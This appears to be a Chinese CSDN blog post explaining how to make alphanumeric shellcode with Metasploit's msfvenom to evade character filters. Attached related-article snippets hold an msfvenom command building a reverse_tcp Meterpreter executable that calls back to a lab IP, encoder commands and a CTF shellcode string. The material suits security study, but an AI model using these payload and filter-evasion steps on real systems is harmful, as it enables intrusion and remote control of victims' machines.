metasploit之字母数字的shellcode

最新推荐文章于 2023-04-28 15:48:14 发布
最新推荐文章于 2023-04-28 15:48:14 发布
阅读量1.3k 收藏 3
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yalecaltech/article/details/86718989
版权

Alphanumeric Shellcode

在攻击过程中,由于被攻击的应用程序的字符串过滤功能,我们有时候可能会需要完全由字母数字组成的shellcode。
通过msfvenom可以很容易产生上述要求的shellcode。
比如我们要产生一个混合了大小写编码的字母数字的shellcode,可以如下图操作:
在这里插入图片描述
我们启动python的交互界面
在这里插入图片描述
然后把之前输出的buf的内容全部复制过来
在这里插入图片描述
之后将其打印
在这里插入图片描述
如果仔细看看shellcode,你会看到一些非字母数字的字符
这是由于在payload开始前的操作码(x89\xe7\xdb\xd7\xd9\x77)。这些操作码是为了在内存中找到有效载荷的绝对位置和获得不依赖于位置的shellcode。
一旦通过前两条指令获得了我们的shellcode地址,它将被压入堆栈并存储在ECX寄存器中,然后用于计算相对偏移量。但是,如果我们能够自己获得shellcode的绝对位置,并在运行shellcode之前将这个地址保存在一个寄存器中,我们可以在编码我们的有效载荷时使用BufferRegister = REG32这个特殊选项:
在这里插入图片描述
和之前的操作一样,我们也是在python交互环境中输出buf看看
首先启动python
在这里插入图片描述
然后把shellcode的buf部分复制过来
在这里插入图片描述
然后使用print打印
在这里插入图片描述
可以看到这次是完全的由字母和数字组成的shellcode
这种用法,相当于我们告诉msfencode,我们负责查找shellcode绝对地址,并将其保存在ECX寄存器中。
正如我们在前面看到的那样,ECX之前被设置为了指向我们的字母数字shellcode的开始。在这一点上,我们的有效载荷开始直接重新对准ECX开始shellcode解码序列。

Elwood Ying
关注
METASPLOITSHELLCODE
weiliang369的博客
02-28 1873
SHELLCODE就是溢出程序的后门。 一个TCP反弹后门,如果某些EXP上的是弹出记事本 我们改如何生成自己想要的SHELLCODE? 首先你要熟悉http://helen.dis9.com/?p=8 (METASPLOIT的PAYLOAD) 我们来生成一个 打开UB 1 生成BIND SHELL吧: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35
【网络安全】Metasploit 生成的 Shellcode 的导入函数解析以及执行流程分析(1)
HBohan的博客
09-13 442
2021 年 4 月,研究人员深入分析了 Cobalt Strike渗透测试技术,以及它的一些签名规避技术是如何在检测技术下失效的。在本文中,我们将深入讨论Metasploit,这是一个可以与Cobalt Strike互操作的常用框架。 在本文中,我们将讨论以下主题: shellcode的导入解析——Metasploit shellcode如何定位来自其他DLL的函数,以及我们如何预先计算这些值来解析来自其他有效载荷变体的任何导入; 逆向shell的执行流程——该过程非常简单; 破坏 Metasploit
[BUUCTF]PWN——mrctf2020_shellcode_revenge(可见字符shellcode
mcmuyanga的博客
03-15 3955
mrctf2020_shellcode_revenge 例行检查,64位程序,开启了RELRO和PIE 本地运行看一下大概的情况 64位ida载入,没法f5,直接看汇编 jg大于则跳转,jl小于则跳转,jump无条件跳转 要让程序继续执行下去,肯定是跳转loc_11AC loc_123A loc_11B8 cdqe使用eax的最高位拓展rax高32位的所有位 movzx则是按无符号数传送+扩展(16-32) EAX是32位的寄存器,而AX是EAX的低16位,AH是ax的高8位,而AL是ax的低
【网络安全】Metasploit 生成的 Shellcode 的导入函数解析以及执行流程分析
qq_44005305的博客
01-06 201
由于shellcode是代码的一个基本版本(它没有预期的结构),操作系统加载程序无法帮助它解析这些导入的函数,更严重的是,操作系统加载程序将无法“执行”shellcode文件。这一观察结果与研究人员将在下一节中观察到的众所周知的常量一起,支持了研究人员的理论,即存储在 ebp 中的地址持有一个指向执行动态导入解析的函数的指针。主循环按照内存中的顺序遍历模块(下图中的蓝色),而对于每个模块,第二个循环遍历导出函数,在所需的导入和可用的导出之间寻找匹配的哈希(下图中的红色)。
metasploit shellcode编码命令....
爱杀之爪的矩阵
10-20 2923
擦 这种东西还是要记下的,不然外出出差电脑上没有这种资料,还要现场去百度搜索 太麻烦了....纠结     ruby ./msfpayload windows/messagebox EXITFUNC=seh TEXT="hack by instruder" TITLE=hack R >messagebox ruby ./msfencode -i messagebox -b '\x00' -
【网络安全】Metasploit生成的Shellcode的导入函数解析以及执行流程分析(2)
HBohan的博客
09-14 437
密码破解的利器——彩虹表(rainbow table) 确定 shellcode 依赖于哪些导入将使研究人员进一步了解其其余逻辑。不用动态分析shellcode,并且考虑到研究人员已经弄清楚了上面的哈希算法,研究人员可以自己构建一个彩虹表。 彩虹表是一个预先计算好的表,用于缓存加密哈希函数的输出,通常用于破解密码哈希。 以下 Python 代码段计算位于最常见系统位置的 DLL 导出的“Metasploit”哈希值。 例如,下面的PowerShell命令生成一个彩虹表,然后搜索下图中首先观察到的72677
针对IIS6.0 WebDAV漏洞(cve-2017-7269)制作纯字符数字shellcode回连msf
MickeyMouse1928的博客
05-04 4812
环境: Kali攻击机1 IP:192.168.114.140 Win7攻击机2 IP(安装gcc和python2.7):192.168.114.130 Windows server 2003目标主机(开启webdev服务):192.168.114.132   在攻击机1中的操作: 使用msfvenom生成shellcode : msfvenom -pwindows/meterpre
metasploit(MSF)渗透平台命令大全
ITgougou_的博客
10-27 364
show exploits 列出metasploit框架中的所有渗透攻击模块。 show payloads 列出metasploit框架中的所有攻击载荷。 show auxiliary 列出metasploit框架中的所有辅助攻击载荷。 search name 查找metasploit框架中所有的渗透攻击和其他模块。 info 展示出制定渗透攻击或模块的相关信息。 use name 装载一个渗透攻击或模块。 LHOST 你本地可以让目标主机连接的IP地址,通常当目标主机不在同一个局域网内时,就需要是一个公.
Metasploit中的exploit和payload详解
Metasploit简介 ## 1.1 Metasploit概述 Metasploit是一款广泛应用于渗透测试和漏洞利用的开源工具。它提供了一个强大的框架,使安全研究人员和黑客能够快速开发、测试和利用各种漏洞。 ## 1.2 Metasploit框架结构...
Metasploit对无线网络的渗透测试
### 1.1 什么是Metasploit Metasploit是一个开源的渗透测试框架,由Rapid7公司开发并维护。它提供了一系列的工具和资源,用于发现、利用和管理计算机系统中的安全漏洞。Metasploit框架包含了丰富的漏洞利用模块,使...
[BUUCTF-pwn]——mrctf2020_shellcode_revenge(可见字符shellcode)(内涵peak小知识)
Y_peak的博客
03-29 1280
[BUUCTF-pwn]——mrctf2020_shellcode_revenge(可见字符shellcode) 检查了下保护发现NX 没有开,肯定要自己写shellcode呀。 不过这道题,刷新了我的认知。众所周知,手写的shellcode里面肯定有很多不可见字符。第一次碰到可见的shellcode。 看下IDA, 不能反汇编不过问题不大,没事. 个人建议,看汇编的时候,建议看流程图,更加直观 将shellcode写入,那个buf 不过下面肯定大于0呀.rbp + var_8是我们输入字符串的长度.发生转
生成自己的Alphanumeric/Printable shellcode
weixin_34112181的博客
11-17 158
http://bobao.360.cn/learning/detail/3720.html 本文转自fatshi51CTO博客,原文链接: http://blog.51cto.com/duallay/1915204,如需转载请自行联系原作者 ...
171115 杂项-可见字符组成的Shellcode
whklhhhh的博客
11-22 1795
1625-5 王子昂 总结《2017年11月15日》 【连续第411天总结】 A. JarvisOJ-Basic-Shellcode B. 题目如下: 下载下来打开以后发现是一段正常字符串: PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIYIhkmKzyCDq4l4FQyBlrRWEahI1tLKT16Pnk1ftLnkP
手把手教你写纯字符ascii shellcode——最通俗易懂的alphanumeric shellcode生成指南
HiTaQini
05-31 5714
ascii shellcode : 自动生成shellcode,手写shellcode
使用alpha3编码shellcode
lurenyi0724的博客
02-14 1909
使用alpha3进行编码shellcode,生成一段没有坏字符的shellcode。然后使用jmp esp进行shellcode注入。 环境:win2000 工具:ollydbg,vc6,010editor 原程序 原程序为example.cpp。 #include <stdio.h> #include <windows.h> #include <string.h> void hack(const char* input) { char buf[10];
shellcode 的艺术
最新发布
2301_77498991的博客
04-28 313
这里总结一下shellcode的各种类型。
Kali下Metasploitshellcode在windows中的使用
weixin_33744141的博客
02-24 710
网络拓扑:kaili系统版本:注:前面的版本在生成shellcode的时候用的是msfpayload命令 1.kaili生成shellcode:root@debian:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.152.131 lport=1211 -f exe &gt; /root/shell.exe()2.侦...
编写shellcode 常见敏感字符
Mr.Out的专栏
10-09 826
<br />编写shellcode 常见敏感字符<br />0x00<br />0x20 <br />0x0A<br />0x0D<br />0x0B<br />0x0c
Metasploit框架基础教程
"Metasploit基础知识" Metasploit是一款强大的安全测试工具,它被广泛用于漏洞利用、渗透测试和安全研究。这个框架由各种接口组成,允许用户以不同的方式与其交互。本文将主要介绍Metasploit中的基础概念和一个重要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值